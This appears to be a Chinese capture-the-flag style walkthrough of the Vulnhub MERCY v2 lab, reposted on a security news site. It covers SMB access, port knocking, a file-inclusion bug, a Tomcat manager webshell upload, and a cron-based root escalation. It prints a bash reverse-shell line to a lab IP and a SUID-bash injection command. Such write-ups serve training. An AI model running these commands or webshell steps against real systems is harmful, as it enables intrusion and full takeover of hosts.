Vulnhub | MERCY v2靶机

admin
admin
admin
138876
文章
114
评论
2025年3月24日19:51:08评论2 views字数 2074阅读6分54秒阅读模式
鼎新安全
don't give up and don't give in !
Vulnhub-MERCY v2

先看一下基本信息

Vulnhub | MERCY v2靶机a这里做了一个简单下信息收集,直接就可以看到有一个8080端口,一看,发现是可以尝试put协议的,所以就可以去尝试上传漏

Vulnhub | MERCY v2靶机这里就可以看到是设置了tomcat的,直接访问一个错误界面,发现了中间件版本是 7.0.52,而put上传漏洞影响范围就在其中,就可以直接去做尝试了

Vulnhub | MERCY v2靶机可以用冰蝎或者哥斯拉做一个码,这里经过上传,发现这个漏洞并不行,就去扫扫目录吧

Vulnhub | MERCY v2靶机这个时候就发现了是有robots的,

这里就可以去看看

Vulnhub | MERCY v2靶机Vulnhub | MERCY v2靶机发现就是一个base64的编码,直接解码一下

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

发现这里是一个提示,说密码是password,那么这里就肯定是有用的,就是不知道哪里能够用到。所以就先留着,通过扫目录也没看到后台什么的,所以就直接去看看开启的端口,因为这里是开启了端口,本来想着试试是否是ssh,但是发现ssh并没有开放,然后就发现是开放了smb,对于靶场来说,每个端口的开放都是有一定作用的,所以这里就来用 enum4linux

扫一下samba服务

Vulnhub | MERCY v2靶机这里就发现一个共享文件夹,

这个时候就可以用到上面的密码了

Vulnhub | MERCY v2靶机成功的访问,就可以看看给出的什么东西了,发现有几个文件夹,这里可以进去看看

Vulnhub | MERCY v2靶机在这里面就是有了两个配置文件,因为在这个共享文件夹里面是没办法访问的,所以就可以直接下载下来查看

Vulnhub | MERCY v2靶机这里就可以看到是一个端口敲门的配置文件

Vulnhub | MERCY v2靶机这里就发现了,是有一个工具knock来做的开启 22 端口和 80 端口

Vulnhub | MERCY v2靶机这里敲门过以后再去看一下端口的是开启了22和80的,这个时候就可以去看看80了

Vulnhub | MERCY v2靶机这里就成功的打开了80端口,这里就再次去扫一下目录看一下

Vulnhub | MERCY v2靶机这里就看到是有一个登录一个robots.txt的

Vulnhub | MERCY v2靶机这里也是给出了两个目录,因为登录界面发现没有什么东西就直接来看这两个目录了

Vulnhub | MERCY v2靶机然后在第二个中发现是 RIPS 框架

Vulnhub | MERCY v2靶机这里发现了框架的话就可以直接去找了,然后找到了一个,直接去看

Vulnhub | MERCY v2靶机Vulnhub | MERCY v2靶机这里就可以看到了,是一个文件包含的漏洞,那么就可以直接去利用

Vulnhub | MERCY v2靶机这里就发现是可以进行利用的,这里是apache的中间件,那么可以试试能不能拿到日志文件

Vulnhub | MERCY v2靶机这里发现拿不到日志文件,那么日志污染就不能用,然后我就发现了在一开始的8080端口是有一个路径的

Vulnhub | MERCY v2靶机这里说的,管理员用户配置是在 tomcat-user.xml中

Vulnhub | MERCY v2靶机

这里发现了账号密码

<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

在上次扫到的8080端口里面是有一个登录界面的,所以这次就拿到用户密码了

Vulnhub | MERCY v2靶机Vulnhub | MERCY v2靶机Vulnhub | MERCY v2靶机这里就成功的拿到了后台,那就去找那个后台的文件上传了

Vulnhub | MERCY v2靶机Vulnhub | MERCY v2靶机利用冰蝎生成一个木马,做一个war包就可以了,然后上传

Vulnhub | MERCY v2靶机也是成功上传了

Vulnhub | MERCY v2靶机上传的路径也就在这里,可以直接去连接试试

Vulnhub | MERCY v2靶机这里也就成功的连接上了

Vulnhub | MERCY v2靶机这里就可以去做一个提权了,在上面我们是发现了两个账号密码的

<user username="fluffy" password="freakishfluffybunny" roles="none"/>

我们包含passwd的时候发现了确实是有fluffy这个账号的,那么我们就可以直接去这个账号上面去看看,这里首先要反弹shell过去

bash -c "bash -i >& /dev/tcp/192.168.193.128/8888 0>&1"

Vulnhub | MERCY v2靶机也就成功的弹了过去,然后再切换到 fluffy 账号上面,这里要注意的是必须要去做一个交互shell才能够换用户

Vulnhub | MERCY v2靶机

python -c 'import pty;pty.spawn("/bin/bash")'

Vulnhub | MERCY v2靶机这样也就成功的切换了用户,那么就可以看看提权了,当然了,在尝试过各种提权方式过以后,找到了

这个目录下面的 

文件是一个定时任务,还是有root权限的

Vulnhub | MERCY v2靶机那么就可以利用这个来进行提权了

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash'>>timeclockcd /tmp/tmp/bash -p

Vulnhub | MERCY v2靶机

 

原文始发于微信公众号(鼎新安全):Vulnhub | MERCY v2靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月24日19:51:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub | MERCY v2靶机https://cn-sec.com/archives/3875138.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息